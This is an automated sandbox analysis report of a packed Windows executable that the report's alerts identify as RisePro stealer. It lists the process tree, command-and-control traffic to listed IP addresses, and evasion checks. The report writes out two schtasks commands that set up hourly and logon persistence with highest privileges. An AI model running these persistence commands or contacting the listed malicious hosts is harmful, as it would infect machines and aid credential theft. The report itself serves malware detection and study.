Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 16, 2024, 7:57 a.m.	Feb. 16, 2024, 7:59 a.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`04354f40a9b6cd2f8f76d1dd35c798c8`
SHA256	`d4754f57e369d788a55966df026e786e78f93ed541a423220ace9c4c0450e222`
CRC32	`78D22951`
ssdeep	`49152:Kpi/7dqGFxEvDjRjCsWxf59H694c6iNUkhIYWoAtnYOItx:KEqGFxEfm16GGFU1pYOI`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

bugai.exe "C:\Users\test22\AppData\Local\Temp\bugai.exe"
2536
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2784
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2856
- orO_4WECHYgkaMJSLpQM.exe "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe"
  2056
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    1728
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1728 CREDAT:145409
      1400
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    2896
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
      2900
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2912 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      2248
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    1064
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
      3168
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2164 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3352
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3124
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
      3428
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3128 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3584
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3404
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      3688
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\db44a753-a558-4425-b26d-ccd1fdec8b29.dmp"
        2140
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\db44a753-a558-4425-b26d-ccd1fdec8b29.dmp"
        3708
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    3636
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      3856
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\105cab5e-fe13-4add-a906-7d615852a790.dmp"
        3788
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\105cab5e-fe13-4add-a906-7d615852a790.dmp"
        588
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    3824
    - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\560e8fa4-00d7-4f91-9040-d97eef083729.dmp"
      3228
      - minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\560e8fa4-00d7-4f91-9040-d97eef083729.dmp"
        344
- PXsW3OSySmisXJvS2lh2.exe "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe"
  2372
- sbQkWyxbcah1ikaoMbtb.exe "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe"
  2992
- 6Lfr2_JvDPSQIOljUsEY.exe "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe"
  2300
- y2p55fFqEFlCcZ1qkquc.exe "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe"
  1964
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    2260
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
      2572
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2508 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      1848

Name	Response	Post-Analysis Lookup
ssl.gstatic.com	A 142.250.66.131	142.250.76.131
accounts.google.com	A 74.125.203.84	64.233.188.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.250.207.68	142.250.206.228
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166

IP Address	Status	Action
104.26.5.15	Active	Moloch
117.18.232.200	Active	Moloch
142.250.207.68	Active	Moloch
142.250.66.131	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.46	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch
74.125.203.84	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2400021	ET DROP Spamhaus DROP Listed Traffic Inbound group 22	Misc Attack
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49183 -> 74.125.203.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 74.125.203.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49187 -> 142.250.66.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 142.250.66.131:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 142.250.207.68:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49191 -> 142.250.207.68:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49196	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49199 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49199 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49212 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49212 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49209	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49199 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49168 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49183 74.125.203.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49182 74.125.203.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49187 142.250.66.131:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49188 142.250.66.131:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49190 142.250.207.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49191 142.250.207.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49201 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49214 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 16, 2024, 7:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 16, 2024, 7:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 16, 2024, 7:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 16, 2024, 7:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 170 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Feb. 16, 2024, 7:58 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Feb. 16, 2024, 7:57 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Feb. 16, 2024, 7:57 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 16, 2024, 7:57 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	vwrytnqv
section	zwedbgwh
section	.taggant

One or more processes crashed (50 out of 383 events)

Time & API	Arguments	Status
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: bugai+0x4070b9 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 4223161 exception.address: 0xff70b9 registers.esp: 3341444 registers.edi: 0 registers.eax: 1 registers.ebp: 3341460 registers.edx: 18534400 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 53 bb 26 9d fe 3d 81 e9 6a 48 fb 7f 01 d9 52 exception.symbol: bugai+0x14c66b exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 1361515 exception.address: 0xd3c66b registers.esp: 3341408 registers.edi: 1968898280 registers.eax: 31813 registers.ebp: 4003897364 registers.edx: 12517376 registers.ebx: 1969145714 registers.esi: 3 registers.ecx: 13876546	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 51 83 ec 04 e9 72 ff ff ff 89 3c 24 c7 04 24 exception.symbol: bugai+0x14c044 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 1359940 exception.address: 0xd3c044 registers.esp: 3341412 registers.edi: 1968898280 registers.eax: 0 registers.ebp: 4003897364 registers.edx: 12517376 registers.ebx: 235753 registers.esi: 3 registers.ecx: 13879343	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 b5 f9 ff ff 83 c4 04 5f c1 ea 07 53 bb a2 exception.symbol: bugai+0x14d695 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 1365653 exception.address: 0xd3d695 registers.esp: 3341408 registers.edi: 13880623 registers.eax: 30604 registers.ebp: 4003897364 registers.edx: 546684689 registers.ebx: 909268511 registers.esi: 3 registers.ecx: 192588732	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 57 89 14 24 e9 00 00 00 00 89 34 24 68 50 b2 exception.symbol: bugai+0x14d62f exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 1365551 exception.address: 0xd3d62f registers.esp: 3341412 registers.edi: 13883335 registers.eax: 0 registers.ebp: 4003897364 registers.edx: 546684689 registers.ebx: 1259 registers.esi: 3 registers.ecx: 192588732	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 55 54 5d e9 f7 fe ff ff 29 fa 5f 89 54 24 04 exception.symbol: bugai+0x2c6ed7 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2911959 exception.address: 0xeb6ed7 registers.esp: 3341412 registers.edi: 15431218 registers.eax: 28365 registers.ebp: 4003897364 registers.edx: 0 registers.ebx: 1269760 registers.esi: 15427335 registers.ecx: 262142056	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 f8 01 00 00 89 24 24 e9 ba fa ff ff 5f 5d exception.symbol: bugai+0x2cd443 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2937923 exception.address: 0xebd443 registers.esp: 3341408 registers.edi: 15431218 registers.eax: 26954 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 57344875 registers.esi: 15452929 registers.ecx: 875	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 a7 f6 ff ff 81 c3 04 00 00 00 81 eb 04 00 exception.symbol: bugai+0x2cd6e9 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2938601 exception.address: 0xebd6e9 registers.esp: 3341412 registers.edi: 15431218 registers.eax: 26954 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 57344875 registers.esi: 15479883 registers.ecx: 875	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 50 e9 1c 00 00 00 89 14 24 89 34 24 e9 f5 01 exception.symbol: bugai+0x2ccb31 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2935601 exception.address: 0xebcb31 registers.esp: 3341412 registers.edi: 1549541099 registers.eax: 26954 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 57344875 registers.esi: 15456031 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 62 00 00 00 2d ce 92 40 8c 89 c5 58 81 c5 exception.symbol: bugai+0x2ce0a9 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2941097 exception.address: 0xebe0a9 registers.esp: 3341408 registers.edi: 0 registers.eax: 27689 registers.ebp: 4003897364 registers.edx: 6907463 registers.ebx: 15456057 registers.esi: 310796428 registers.ecx: 15458310	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 56 57 53 e9 c9 fb ff ff 89 c2 8b 04 24 83 c4 exception.symbol: bugai+0x2cebea exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2943978 exception.address: 0xebebea registers.esp: 3341412 registers.edi: 0 registers.eax: 27689 registers.ebp: 4003897364 registers.edx: 134889 registers.ebx: 15456057 registers.esi: 0 registers.ecx: 15461395	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 ec 04 89 1c 24 54 5b exception.symbol: bugai+0x2db538 exception.instruction: in eax, dx exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2995512 exception.address: 0xecb538 registers.esp: 3341404 registers.edi: 6761879 registers.eax: 1447909480 registers.ebp: 4003897364 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 15490535 registers.ecx: 20	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: bugai+0x2d9288 exception.address: 0xec9288 exception.module: bugai.exe exception.exception_code: 0xc000001d exception.offset: 2986632 registers.esp: 3341404 registers.edi: 6761879 registers.eax: 1 registers.ebp: 4003897364 registers.edx: 22104 registers.ebx: 0 registers.esi: 15490535 registers.ecx: 20	1
